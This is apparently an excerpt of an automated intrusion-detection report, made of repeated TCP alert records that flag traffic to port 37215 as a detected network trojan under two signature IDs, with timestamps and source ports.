                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407944
                SID:2835222
                Source Port:60508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860213
                SID:2829579
                Source Port:55660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972068
                SID:2835222
                Source Port:40798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567483
                SID:2829579
                Source Port:52350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.334628
                SID:2829579
                Source Port:54414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563586
                SID:2835222
                Source Port:48464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150903
                SID:2835222
                Source Port:45916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503729
                SID:2835222
                Source Port:56756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848128
                SID:2835222
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504656
                SID:2829579
                Source Port:39656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688427
                SID:2835222
                Source Port:35978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160400
                SID:2829579
                Source Port:54840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762516
                SID:2829579
                Source Port:58034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716998
                SID:2829579
                Source Port:51552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766144
                SID:2829579
                Source Port:42198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002291
                SID:2829579
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763355
                SID:2829579
                Source Port:42510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811740
                SID:2835222
                Source Port:55260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663517
                SID:2829579
                Source Port:39874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735058
                SID:2835222
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764040
                SID:2835222
                Source Port:52198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405363
                SID:2829579
                Source Port:55586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184216
                SID:2829579
                Source Port:46336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225047
                SID:2829579
                Source Port:52754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199024
                SID:2829579
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024763
                SID:2829579
                Source Port:52320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670122
                SID:2835222
                Source Port:38356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021891
                SID:2835222
                Source Port:44676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828694
                SID:2829579
                Source Port:44236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052384
                SID:2829579
                Source Port:47034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944087
                SID:2829579
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501438
                SID:2835222
                Source Port:58644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616348
                SID:2829579
                Source Port:46334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027420
                SID:2829579
                Source Port:55168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010986
                SID:2829579
                Source Port:49428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762062
                SID:2829579
                Source Port:45710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829488
                SID:2835222
                Source Port:54278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273936
                SID:2829579
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131960
                SID:2829579
                Source Port:56990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180537
                SID:2835222
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344357
                SID:2829579
                Source Port:42014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688207
                SID:2835222
                Source Port:32900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324078
                SID:2835222
                Source Port:51144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762902
                SID:2835222
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.319833
                SID:2835222
                Source Port:51602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176986
                SID:2829579
                Source Port:33534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737850
                SID:2835222
                Source Port:38010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858245
                SID:2835222
                Source Port:37164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991009
                SID:2829579
                Source Port:47156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021590
                SID:2835222
                Source Port:54404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999845
                SID:2829579
                Source Port:42846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276690
                SID:2829579
                Source Port:57892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681725
                SID:2835222
                Source Port:49224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882102
                SID:2835222
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150757
                SID:2829579
                Source Port:54722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031708
                SID:2835222
                Source Port:44932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274546
                SID:2835222
                Source Port:44686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778052
                SID:2829579
                Source Port:48724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581477
                SID:2829579
                Source Port:48216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987209
                SID:2835222
                Source Port:59546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275752
                SID:2835222
                Source Port:60036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718269
                SID:2829579
                Source Port:49556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806920
                SID:2829579
                Source Port:48110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164073
                SID:2835222
                Source Port:35486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805391
                SID:2829579
                Source Port:37024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809442
                SID:2835222
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337880
                SID:2835222
                Source Port:57946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200351
                SID:2829579
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977526
                SID:2829579
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273510
                SID:2835222
                Source Port:46698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052293
                SID:2829579
                Source Port:40806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790472
                SID:2829579
                Source Port:50256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803677
                SID:2829579
                Source Port:34248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146198
                SID:2835222
                Source Port:45354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277239
                SID:2835222
                Source Port:54250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861740
                SID:2835222
                Source Port:51792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702888
                SID:2835222
                Source Port:34554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184984
                SID:2829579
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202973
                SID:2829579
                Source Port:53236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640762
                SID:2835222
                Source Port:54560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667165
                SID:2829579
                Source Port:53430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022714
                SID:2835222
                Source Port:54886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980105
                SID:2829579
                Source Port:41772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452358
                SID:2829579
                Source Port:37626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669159
                SID:2829579
                Source Port:39190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703055
                SID:2835222
                Source Port:38424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185960
                SID:2835222
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985143
                SID:2829579
                Source Port:44034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078411
                SID:2829579
                Source Port:42966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146474
                SID:2835222
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646923
                SID:2829579
                Source Port:35448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086757
                SID:2829579
                Source Port:46984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412022
                SID:2835222
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178313
                SID:2829579
                Source Port:46488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113964
                SID:2829579
                Source Port:35236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366157
                SID:2835222
                Source Port:38522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452038
                SID:2835222
                Source Port:55708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812574
                SID:2829579
                Source Port:54780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764952
                SID:2835222
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761174
                SID:2835222
                Source Port:58450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778378
                SID:2829579
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291645
                SID:2829579
                Source Port:42324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160491
                SID:2835222
                Source Port:52522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827618
                SID:2835222
                Source Port:48562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469956
                SID:2835222
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134924
                SID:2835222
                Source Port:39554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367151
                SID:2829579
                Source Port:52732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452882
                SID:2835222
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763184
                SID:2835222
                Source Port:37086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419677
                SID:2829579
                Source Port:47918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013859
                SID:2835222
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072035
                SID:2835222
                Source Port:48554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625386
                SID:2835222
                Source Port:37872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916832
                SID:2829579
                Source Port:39546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792891
                SID:2829579
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766858
                SID:2829579
                Source Port:41220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807989
                SID:2835222
                Source Port:59160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862187
                SID:2829579
                Source Port:34200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472258
                SID:2835222
                Source Port:35622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716612
                SID:2829579
                Source Port:57890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668343
                SID:2835222
                Source Port:51550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547894
                SID:2835222
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849860
                SID:2829579
                Source Port:58954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420638
                SID:2835222
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182760
                SID:2835222
                Source Port:49138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186256
                SID:2835222
                Source Port:43392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702596
                SID:2829579
                Source Port:60972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662201
                SID:2835222
                Source Port:50816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725941
                SID:2829579
                Source Port:58404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859300
                SID:2835222
                Source Port:51840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411713
                SID:2829579
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729585
                SID:2835222
                Source Port:50890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760679
                SID:2835222
                Source Port:38208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679206
                SID:2835222
                Source Port:41646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404346
                SID:2835222
                Source Port:53130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860184
                SID:2829579
                Source Port:56658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984357
                SID:2829579
                Source Port:53594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544683
                SID:2835222
                Source Port:47822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882704
                SID:2829579
                Source Port:43002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703152
                SID:2835222
                Source Port:50806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941838
                SID:2835222
                Source Port:39970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182234
                SID:2835222
                Source Port:38064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011324
                SID:2829579
                Source Port:36822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469615
                SID:2829579
                Source Port:47200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724501
                SID:2835222
                Source Port:45418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323872
                SID:2835222
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779301
                SID:2829579
                Source Port:35906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143188
                SID:2829579
                Source Port:50154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735463
                SID:2829579
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943897
                SID:2835222
                Source Port:35376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275958
                SID:2829579
                Source Port:36582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323969
                SID:2829579
                Source Port:34862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717532
                SID:2835222
                Source Port:42704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810107
                SID:2829579
                Source Port:45190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186565
                SID:2829579
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984437
                SID:2829579
                Source Port:40872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644829
                SID:2829579
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028363
                SID:2829579
                Source Port:42384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857497
                SID:2829579
                Source Port:56516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149509
                SID:2829579
                Source Port:36418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760411
                SID:2829579
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735568
                SID:2835222
                Source Port:39364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057484
                SID:2829579
                Source Port:32858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808324
                SID:2835222
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160848
                SID:2835222
                Source Port:48812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719072
                SID:2835222
                Source Port:52984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967082
                SID:2835222
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024186
                SID:2829579
                Source Port:49804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453836
                SID:2829579
                Source Port:42916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831363
                SID:2829579
                Source Port:36632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913699
                SID:2829579
                Source Port:38718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979684
                SID:2835222
                Source Port:38654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729978
                SID:2829579
                Source Port:48004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052165
                SID:2829579
                Source Port:34880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943485
                SID:2829579
                Source Port:51062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848328
                SID:2835222
                Source Port:45560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943669
                SID:2835222
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274369
                SID:2835222
                Source Port:50334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051770
                SID:2835222
                Source Port:45396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847609
                SID:2829579
                Source Port:36102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202238
                SID:2829579
                Source Port:48998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149553
                SID:2835222
                Source Port:42688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324772
                SID:2829579
                Source Port:55676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676891
                SID:2829579
                Source Port:35016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766607
                SID:2829579
                Source Port:40360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421038
                SID:2835222
                Source Port:46582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291743
                SID:2829579
                Source Port:36550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980588
                SID:2829579
                Source Port:44196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083916
                SID:2835222
                Source Port:55930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616760
                SID:2829579
                Source Port:54764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.009379
                SID:2829579
                Source Port:51640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719099
                SID:2829579
                Source Port:42520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289578
                SID:2835222
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381414
                SID:2829579
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933509
                SID:2835222
                Source Port:38850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978171
                SID:2835222
                Source Port:41088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762525
                SID:2829579
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
